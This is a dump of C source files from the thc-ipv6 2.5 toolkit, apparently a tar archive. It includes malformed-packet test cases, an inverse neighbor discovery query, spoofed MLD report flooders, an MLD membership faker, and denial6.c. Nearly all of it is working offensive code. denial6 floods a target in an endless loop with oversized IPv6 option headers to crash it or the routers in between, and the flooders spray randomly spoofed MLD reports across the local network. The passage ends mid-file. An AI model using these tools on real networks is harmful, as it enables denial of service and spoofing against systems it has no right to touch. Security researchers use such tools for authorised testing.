(test == 0 || test == count) { printf("Test %2d: filled ignore destination option\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); i = 0; for (j = 0; j < 10; j++) { buf[i++] = NXT_IGNORE; // ignore, length buf[i++] = j; if (j > 0) { memset(buf + i, 0xaa, j); i += j; } } /* buf[i++] = 0xc9; // mobility, length 16 buf[i++] = 16; memcpy(buf+i, src6, 16); i += 16; buf[i++] = 4; // tunnel max encaps, length 1 buf[i++] = 1; buf[i++] = 0; */ buf[i++] = 1; // padN, length 2 buf[i++] = 2; buf[i++] = count % 256; buf[i++] = count % 256; buf[i++] = 0; // pad1 if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, i) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 140, 140 + i, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: filled padding destination option\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); i = 0; for (j = 0; j < 10; j++) { buf[i++] = 1; // ignore, length buf[i++] = j; if (j > 0) { memset(buf + i, 0, j); i += j; } } buf[i++] = 1; // padN, length 2 buf[i++] = 2; buf[i++] = 0; buf[i++] = 0; buf[i++] = 0; // pad1 if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, i) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 140, 140 + i, bla)) tests[count] = 1; } count++; // dst: mobility 0xc9|0x10|src6 // dst: tunnel max encapsulation 4|1|1 if (test == 0 || test == count) { printf("Test %2d: jumbo option size < 64k\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = 0xc2; buf[1] = 4; buf[5] = 166; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_pkt(interface, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 140, 140 + i, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: jumbo option size < 64k, length 0\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = 0xc2; buf[1] = 4; buf[5] = 166; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; i = offset; hdr->pkt[4 + i] = 0; // set ip length to 0 hdr->pkt[5 + i] = 0; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_pkt(interface, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 140, 140 + i, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: error option in hop-by-hop\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = 0xc3; buf[1] = 4; buf[5] = 166; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_pkt(interface, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 140, 140 + i, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: error option in dsthdr\t\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = 0xc3; buf[1] = 4; buf[5] = 166; if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_pkt(interface, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 140, 140 + i, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: 0 length field\t\t\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; i = offset; hdr->pkt[4 + i] = 0; // set ip length to 0 hdr->pkt[5 + i] = 0; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_pkt(interface, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 140, 140 + i, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: too large length field\t\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; i = offset; hdr->pkt[4 + i] = 1; // set ip length to 0 hdr->pkt[5 + i] = 0; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_pkt(interface, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 140, 140 + i, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: too small length field\t\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; i = offset; hdr->pkt[4 + i] = 0; // set ip length to 0 hdr->pkt[5 + i] = 60; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_pkt(interface, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 140, 140 + i, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: ping6 with bad checksum\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0x6666); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 100, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: ping6 with zero checksum\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0x6666); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; memset(hdr->pkt + hdr->pkt_len - 150 - 6, 0, 2); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_pkt(interface, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 100, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: fragment missing\t\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, sizeof(bla) > 1400 ? 1400 : sizeof(bla), 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; /* frag stuff */ hdr = (thc_ipv6_hdr *) pkt; i = ((hdr->pkt_len - 40 - offset - 10) / 8) * 8; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 0, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 128, 0, count)) return -1; memcpy(buf, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, hdr->pkt_len - 40 - offset - 22)) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore pkt3 = thc_destroy_packet(pkt3); /* lets see if it worked */ pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, fragsize - 200, 0, bla)) tests[count] = 1; } count++; // more needed? /******************* END OF TESTCASES ***************************/ if (noping == 0) { if (check_alive(p, interface, src6, dst6)) printf("Test %2d: normal ping6 (still alive?)\t\tPASSED - we got a reply\n", count); else printf("Test %2d: normal ping6 (still alive?)\t\tFAILED - target is unavailable now!\n", count); } thc_pcap_close(p); return ret_code; } thc-ipv6-2.5/inverse_lookup6.c0000644000000000000000000000654712251022440015020 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" int rawmode = 0; unsigned char dmac[6], *mac; int done = 0; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface mac-address\n\n", prg); printf("Performs an inverse address query, to get the IPv6 addresses that are assigned\n"); printf("to a MAC address. Note that only few systems support this yet.\n"); exit(-1); } void check_packets(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { unsigned char *ptr = (unsigned char *) data; int len = header->caplen, i, j; if (rawmode == 0) { if (do_hdr_size) { ptr += do_hdr_size; len -= do_hdr_size; if ((ptr[0] & 240) != 0x60) return; } else { ptr += 14; len -= 14; } } if (debug) thc_dump_data(ptr, len, "Received Packet"); if (ptr[6] == 0x3a && ptr[40] == ICMP6_INVNEIGHBORADV && len >= 56) { done = 1; j = (len - 56) / 16; if (j == 0) { printf("Empty Inverse Neighbor Discovery message received by %s for %s\n", thc_ipv62notation((char *) ptr + 8), mac); } else { printf("Inverse Advertisement Discovery message received by %s for %s (%d entries):\n", thc_ipv62notation((char *) ptr + 8), mac, j); for (i = 0; i < j; i++) printf(" %s\n", thc_ipv62notation((char *) ptr + 56 + i * 16)); } } } int main(int argc, char *argv[]) { unsigned char *pkt1 = NULL, buf[24]; unsigned char *dst6 = NULL, *smac, dstmac[16] = "", *dmac = dstmac; int pkt1_len = 0; char *interface, string[64] = "icmp6"; pcap_t *p; memset(buf, 0, sizeof(buf)); if (argc != 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); interface = argv[1]; sscanf(argv[2], "%x:%x:%x:%x:%x:%x", (unsigned int *) &dmac[0], (unsigned int *) &dmac[1], (unsigned int *) &dmac[2], (unsigned int *) &dmac[3], (unsigned int *) &dmac[4], (unsigned int *) &dmac[5]); mac = argv[2]; if ((smac = thc_get_own_mac(interface)) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } dst6 = thc_resolve6("ff02::1"); if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt1_len, NULL, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = 0x01; buf[1] = 0x01; memcpy(buf + 2, smac, 6); buf[8] = 0x02; buf[9] = 0x01; memcpy(buf + 10, dmac, 6); if (thc_add_icmp6(pkt1, &pkt1_len, ICMP6_INVNEIGHBORSOL, 0, 0, (unsigned char *) &buf, 16, 0) < 0) return -1; if (thc_generate_pkt(interface, smac, dmac, pkt1, &pkt1_len) < 0) { fprintf(stderr, "Error: Can not generate packet, exiting ...\n"); exit(-1); } if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } printf("Sending inverse packet for %s\n", argv[1]); thc_send_pkt(interface, pkt1, &pkt1_len); sleep(1); while (thc_pcap_check(p, (char *) check_packets, NULL)); return 0; // never reached } thc-ipv6-2.5/flood_mld6.c0000644000000000000000000000513412251022436013707 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface [target]\n\n", prg); printf("Flood the local network with MLD reports.\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } int main(int argc, char *argv[]) { char *interface, mac[6] = ""; unsigned char *mac6 = mac, *ip6 = thc_resolve6("fe80::ff:fe00:0"); unsigned char buf[6], buf2[16]; unsigned char *dst = thc_resolve6("ff02::2"), *dstmac = thc_get_multicast_mac(dst); int i; unsigned char *pkt = NULL; int pkt_len = 0; int rawmode = 0; int count = 0; if (argc < 2 || argc > 4 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); interface = argv[1]; if (thc_get_own_mac(interface) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (argc > 2) if ((dst = thc_resolve6(argv[2])) == NULL) { fprintf(stderr, "Error: can not resolve %s\n", argv[2]); exit(-1); } mac[0] = 0x00; mac[1] = 0x18; ip6[9] = mac[1]; memset(buf, 0, sizeof(buf)); buf[0] = 5; buf[1] = 2; memset(buf2, 0, sizeof(buf2)); buf2[0] = 0xff; buf2[1] = 0x02; printf("Starting to flood network with MLD reports on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface); while (1) { for (i = 0; i < 6; i++) buf2[10 + i] = rand() % 256; for (i = 0; i < 4; i++) mac[2 + i] = rand() % 256; // ip6[9] = mac[1]; ip6[10] = mac[2]; ip6[13] = mac[3]; ip6[14] = mac[4]; ip6[15] = mac[5]; count++; if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 1, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) < 0) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_MLD_REPORT, 0, 0, buf2, sizeof(buf2), 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) { // fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface); // perror(""); // return -1; printf("!"); } pkt = thc_destroy_packet(pkt); // usleep(1); if (count % 1000 == 0) printf("."); } return 0; } thc-ipv6-2.5/fake_mld6.c0000644000000000000000000001236212251022435013512 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" int rawmode = 0; char *multicast6 = NULL; int empty = 0; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-l] interface add|delete|query [multicast-address [target-address [ttl [own-ip [own-mac-address [destination-mac-address]]]]]]\n\n", prg); printf("Ad(d)vertise or delete yourself - or anyone you want - in a multicast group of your choice\n"); printf("Query ask on the network who is listening to multicast addresses\n"); printf("Use -l to loop and send (in 5s intervals) until Control-C is pressed.\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } void check_packets(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { unsigned char *ptr = (unsigned char *) data, len = header->caplen - 14; if (rawmode == 0) ptr += 14; if (do_hdr_size) { ptr += (do_hdr_size - 14); len -= (do_hdr_size - 14); if ((ptr[0] & 240) != 0x60) return; } if (debug) thc_dump_data(ptr, len, "Received Packet"); if (ptr[6] == 0 && ptr[40] == 0x3a && ptr[41] == 0 && ptr[42] == 5 && ptr[48] == ICMP6_MLD_REPORT && len >= 72) if (empty == 1 || memcmp(multicast6, ptr + 56, 16) == 0) printf("MLD Report: %s is listening on %s\n", thc_ipv62notation(ptr + 8), thc_ipv62notation(ptr + 56)); } int main(int argc, char *argv[]) { unsigned char *pkt1 = NULL, buf[24]; unsigned char *dst6 = NULL, *src6 = NULL, srcmac[16] = "", *mac = srcmac, dstmac[16] = "", *dmac = dstmac; int pkt1_len = 0, i = 0, j; char *interface, string[64] = "ip6 and not udp and not tcp"; int ttl = 1, mode = 0, wait = 0, loop = 0; pcap_t *p; memset(buf, 0, sizeof(buf)); if (argc > 1 && argv[0] != NULL && strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } if (argc > 1 && argv[0] != NULL && strcmp(argv[1], "-l") == 0) { loop = 1; argv++; argc--; } if (argc > 1 && argv[0] != NULL && strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); interface = argv[1]; if (strncasecmp(argv[2], "add", 3) == 0) mode = ICMP6_MLD_REPORT; if (strncasecmp(argv[2], "del", 3) == 0) mode = ICMP6_MLD_DONE; if (strncasecmp(argv[2], "que", 3) == 0) { mode = ICMP6_MLD_QUERY; wait = 0x0444 << 16; } if (mode == 0) { fprintf(stderr, "Error: no mode defined, specify add, delete or query\n"); exit(-1); } if (argc == 3 || argv[3] == NULL || argv[3][0] == 0) { multicast6 = thc_resolve6("::"); empty = 1; } else { if ((multicast6 = thc_resolve6(argv[3])) == NULL) { fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[3]); exit(-1); } for (j = 0; j < 16; j++) i += multicast6[j]; if (i == 0) empty = 1; } if (argv[4] != NULL && argc > 4) dst6 = thc_resolve6(argv[4]); else if (mode == ICMP6_MLD_QUERY) { if (memcmp(multicast6, buf, 16)) dst6 = multicast6; else dst6 = thc_resolve6("ff02::1"); } else dst6 = thc_resolve6("ff02::2"); if (argv[5] != NULL && argc > 5) ttl = atoi(argv[5]); if (argv[6] != NULL && argc > 6) src6 = thc_resolve6(argv[6]); else src6 = thc_get_own_ipv6(interface, dst6, PREFER_LINK); if (rawmode == 0) { if (argv[7] != NULL && argc > 7) sscanf(argv[7], "%x:%x:%x:%x:%x:%x", (unsigned int *) &srcmac[0], (unsigned int *) &srcmac[1], (unsigned int *) &srcmac[2], (unsigned int *) &srcmac[3], (unsigned int *) &srcmac[4], (unsigned int *) &srcmac[5]); else mac = thc_get_own_mac(interface); if (argv[8] != NULL && argc > 8) sscanf(argv[8], "%x:%x:%x:%x:%x:%x", (unsigned int *) &dstmac[0], (unsigned int *) &dstmac[1], (unsigned int *) &dstmac[2], (unsigned int *) &dstmac[3], (unsigned int *) &dstmac[4], (unsigned int *) &dstmac[5]); else dmac = NULL; } if ((p = thc_pcap_init_promisc(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt1_len, src6, dst6, ttl, 0, 0, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = 5; buf[1] = 2; if (thc_add_hdr_hopbyhop(pkt1, &pkt1_len, buf, 6) < 0) return -1; memset(buf, 0, sizeof(buf)); memcpy(buf, multicast6, 16); if (thc_add_icmp6(pkt1, &pkt1_len, mode, 0, wait, (unsigned char *) &buf, 16, 0) < 0) return -1; if (thc_generate_pkt(interface, mac, dmac, pkt1, &pkt1_len) < 0) { fprintf(stderr, "Error: Can not generate packet, exiting ...\n"); exit(-1); } printf("Sending packet%s for %s%s\n", loop ? "s" : "", empty ? "::" : argv[3], loop ? " (Press Control-C to end)" : ""); do { thc_send_pkt(interface, pkt1, &pkt1_len); sleep(5); if (mode == ICMP6_MLD_QUERY) while (thc_pcap_check(p, (char *) check_packets, NULL)); } while (loop); return 0; // never reached } thc-ipv6-2.5/denial6.c0000644000000000000000000001310112251022434013173 0ustar rootroot /* * Tests various known IPv6 vulnerabilities against a target. * */ #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" #define MAX_TEST 2 int rawmode = 0; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface destination test-case-number\n\n", prg); printf("Performs various denial of service attacks on a target\n"); printf("If a system is vulnerable, it can crash or be under heavy load, so be careful!\n"); printf("If not test-case-number is supplied, the list of shown.\n"); // printf("Use -r to use raw mode.\n"); printf("\n"); exit(-1); } int main(int argc, char *argv[]) { int test = 0, count = 1, tmplen; unsigned char buf[65536], bla[1500], tests[256]; unsigned char *dst6, *ldst6 = malloc(16), *src6, *lsrc6, *mcast6, *route6, *mal; unsigned char *srcmac = NULL, *dstmac = NULL, *routers[2], null_buffer[6]; thc_ipv6_hdr *hdr; int i, j, k, srcmtu, fragsize; unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL; int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0, noping = 0, mtu = 1500; char *interface; thc_ipv6_hdr *ipv6; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } interface = argv[1]; if ((dst6 = thc_resolve6(argv[2])) == NULL) { fprintf(stderr, "Error: invalid target: %s\n", argv[2]); exit(-1); } //route6 = thc_resolve6("2a01::"); memcpy(ldst6, dst6, 16); memset(ldst6 + 2, 0, 6); ldst6[0] = 0xfe; ldst6[1] = 0x80; mcast6 = thc_resolve6("ff02::1"); if (argc >= 4) test = atoi(argv[3]); memset(null_buffer, 0, sizeof(null_buffer)); src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL); if ((lsrc6 = thc_get_own_ipv6(interface, ldst6, PREFER_LINK)) == NULL) { fprintf(stderr, "Error: invalid interface: %s\n", interface); exit(-1); } srcmac = thc_get_own_mac(interface); if (rawmode == 0) { if ((dstmac = thc_get_mac(interface, src6, dst6)) == NULL) { fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]); exit(-1); } } else dstmac = null_buffer; if ((srcmtu = thc_get_mtu(interface)) <= 0) { fprintf(stderr, "ERROR: can not get mtu from interface %s\n", interface); exit(-1); } fragsize = ((srcmtu - 62) / 8) * 8; setvbuf(stdout, NULL, _IONBF, 0); memset(buf, 0, sizeof(buf)); memset(tests, 0, sizeof(tests)); memset(bla, 0, sizeof(bla)); if (test < 1 || test > MAX_TEST) { printf("%s %s (c) 2013 by %s %s\n\n", argv[0], VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface destination test-case-number\n\n", argv[0]); printf("The following test cases are currently implemented:\n"); printf(" 1 : large hop-by-hop header with router-alert and filled with unknown options\n"); printf(" 2 : large destination header filled with unknown options\n"); exit(0); } printf("Performing denial of service test case no. %d attack on %s via %s:\n", test, argv[2], argv[1]); printf("A \".\" is shown for every 1000 packets sent, press Control-C to end...\n"); /********************** TEST CASES ************************/ if (test == count) { // 1432 printf("Test %d: large hop-by-hop header with router-alert and filled with unknown options.\n", count); printf("WARNING: this attack affects all routers on the network path to the target!!\n"); sleep(3); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; buf[0] = 5; buf[1] = 2; j = 4; i = 2; while (j <= 1408) { k = (i % 63) + 1; buf[j] = k; switch (k) { case 38: // quickstart buf[j + 1] = 6; // length buf[j + 2] = 1; // request type + rate buf[j + 3] = 60; //qs-ttl buf[j + 4] = 8; // nonce j += 8; break; case 5: // prevent router alert option twice buf[j] = 1; // fall through default: buf[j + 1] = 2; j += 4; } j += buf[j + 1] + 2; i++; } for (i = 1; i < 236; i++) { buf[i * 6 - 2] = (i % 63) + 1; buf[i * 6 - 1] = 4; } if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 1416) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; } count++; if (test == count) { // 1432 printf("Test %d: large destination header filled with unknown options.\n", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; for (i = 1; i < 237; i++) { buf[6 + i * 6] = (i % 63) + 1; buf[5 + i * 6] = 4; } if (thc_add_hdr_dst(pkt, &pkt_len, buf, 1416) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; } count++; if (test == count) { // 1432 // code } count++; /******************* END OF TESTCASES ***************************/ count = 0; while (1) { thc_send_pkt(interface, pkt, &pkt_len); usleep(1); count++; if (count % 1000 == 0) printf("."); } return 0; } thc-ipv6-2.5/flood_mld26.c0000644000000000000000000000572412251022436013776 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" #define RECORD_NUMBER 8 void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface [target]\n\n", prg); printf("Flood the local network with MLDv2 reports.\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } int main(int argc, char *argv[]) { char *interface, mac[6] = ""; unsigned char *mac6 = mac, *ip6 = thc_resolve6("fe80::ff:fe00:0"); unsigned char buf[6], buf2[RECORD_NUMBER * (4 + 16 + 16)]; unsigned char *dst = thc_resolve6("ff02::16"), *dstmac = thc_get_multicast_mac(dst); int i, j; unsigned char *pkt = NULL; int pkt_len = 0; int rawmode = 0; int count 